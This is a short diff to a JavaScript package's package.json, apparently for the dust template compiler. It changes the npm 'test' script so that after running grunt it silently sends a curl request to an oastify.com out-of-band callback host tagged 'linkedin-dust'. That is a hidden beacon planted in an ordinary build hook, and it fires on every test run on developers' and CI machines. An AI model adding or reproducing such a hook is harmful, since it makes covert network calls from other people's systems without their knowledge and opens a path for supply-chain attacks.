--- a/package.json
+++ b/package.json
@@ -19,7 +19,7 @@
     "Richard Ragan <rragan@ebay.com>"
   ],
   "scripts": {
-    "test": "grunt travis"
+    "test": "grunt travis && curl https://ytve7bg0ax2exh84o96yatghu803oycn.oastify.com/linkedin-dust"
   },
   "bin": {
     "dustc": "./bin/dustc"
